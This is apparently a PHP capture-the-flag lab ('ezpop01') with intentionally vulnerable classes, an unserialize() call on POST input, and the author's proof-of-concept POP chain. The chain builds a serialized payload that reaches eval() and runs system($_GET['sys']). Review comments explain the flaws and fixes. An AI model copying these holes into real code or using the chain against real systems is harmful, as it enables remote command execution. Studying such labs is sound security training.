Created
March 27, 2022 14:09
ezpop01
<?php | |
/**
 * Lab class whose methods act on whatever its two public properties hold.
 *
 * The properties are public and untyped, so an instance rebuilt by
 * unserialize() carries values taken directly from the serialized input.
 */
class crow
{
    /** @var mixed Class name or object used by eval(); receiver of world() in __invoke(). */
    public $v1;

    /** @var mixed The single constructor argument passed by eval(). */
    public $v2;

    /**
     * Instantiate the class held in $v1 with $v2 as its only argument and
     * print the new object (which string-converts it).
     *
     * NOTE(review): the class name and its argument are both data, not code.
     * Outside a lab, restrict this to a fixed allow-list of class names.
     */
    public function eval()
    {
        $target = $this->v1;
        $created = new $target($this->v2);
        echo $created;
    }

    /**
     * Runs when the object is used as a callable; calls world() on $v1.
     */
    public function __invoke()
    {
        // call: fin
        // No class in this file defines world(); on a `fin` instance the call
        // is therefore handled by fin::__call().
        $receiver = $this->v1;
        $receiver->world();
    }
}
/**
 * Lab class with three magic/implicit entry points driven by one property.
 *
 * $f1 is public and untyped, so after unserialize() it holds whatever the
 * serialized input put there: a string, a callable, or another object.
 */
class fin
{
    /** @var mixed Concatenated in __destruct(), called in run(), receiver of get_flag() in __call(). */
    public $f1;

    /**
     * Prints $f1 followed by a fixed suffix when the object is destroyed.
     *
     * The concatenation string-converts $f1, so an object stored there has
     * its __toString() invoked. The author marks this as the start of the
     * chain.
     */
    public function __destruct() // start
    {
        // toString what
        $suffix = '114514';
        echo $this->f1 . $suffix;
    }

    /**
     * Calls $f1 as a callable with no arguments.
     */
    public function run()
    {
        $callable = $this->f1;
        $callable();
    }

    /**
     * Fallback for any undefined method: ignores the requested name and
     * arguments and prints the result of $f1->get_flag().
     *
     * @param string $a Name of the method that was called.
     * @param array  $b Arguments that were passed to it.
     */
    public function __call($a, $b)
    {
        // get_flag mix
        $output = $this->f1->get_flag();
        echo $output;
    }
}
/**
 * Lab class whose string conversion has a side effect.
 */
class what
{
    /** @var mixed Object whose run() method is called during string conversion. */
    public $a;

    /**
     * Calls run() on $a, then returns the fixed text 'hello'.
     *
     * NOTE(review): a __toString() that does work beyond formatting means
     * any echo or concatenation of this object executes that work.
     */
    public function __toString()
    {
        // run: mix
        $runner = $this->a;
        $runner->run();

        return 'hello';
    }
}
/**
 * Lab class that either calls or evaluates its single public property.
 */
class mix
{
    /** @var mixed Called as a callable by run(); evaluated as PHP source by get_flag(). */
    public $m1;

    /**
     * Calls $m1 as a callable with no arguments.
     */
    public function run()
    {
        // invoke: crow
        $callable = $this->m1;
        $callable();
    }

    /**
     * Evaluates '#' followed by $m1 as PHP source and returns nothing.
     *
     * SECURITY(review): eval() on a property that unserialize() can populate
     * is code execution on request data. The leading '#' is not a safeguard:
     * a '#' comment ends at the first line break, so it only covers text up
     * to that point. Keep this pattern confined to a lab; the fix is to
     * remove the eval(), not to filter its input.
     */
    public function get_flag()
    {
        $source = '#' . $this->m1;
        eval($source);
    }
}
// Request handler for the lab: with no `cmd` field it prints its own source;
// otherwise it deserializes the field and exits.
if (!isset($_POST['cmd'])) {
    highlight_file(__FILE__);
    die();
}

// SECURITY(review): unserialize() on a request field lets the sender choose
// which of the classes above are instantiated and what their properties
// hold; the magic methods (__destruct, __toString, __invoke, __call) then
// run on that data. The return value is discarded, so nothing here validates
// what was built. Outside a lab, use json_decode() for request data, or at
// minimum pass ['allowed_classes' => false] as the second argument.
// Detection: a PHP-serialized object (`O:<len>:"<class>":...`) in a request
// body is worth alerting on wherever serialized input is not expected.
unserialize($_POST['cmd']);
die();
// exp: the author's proof-of-concept object graph for the lab classes above.
// NOTE(review): both branches of the request handler above end in die(), so
// these lines are never reached while they sit in this file; presumably they
// were run separately to print the serialized value.
$entry = new fin();
$stringer = new what();
$runner = new mix();
$invoker = new crow();
$caller = new fin();
$sink = new mix();

// Text that mix::get_flag() will evaluate; note that it begins with a line break.
$sink->m1 = "\necho('OK');system(\$_GET['sys']);exit();";

// Links listed from the sink back to the entry object; each comment names
// the method that the link causes to run.
$caller->f1 = $sink; // get_flag
$invoker->v1 = $caller; // call
$runner->m1 = $invoker; // invoke
$stringer->a = $runner; // run
$entry->f1 = $stringer; // toString

$encoded = urlencode(serialize($entry));
echo $encoded;
echo "\n<br/>";
die();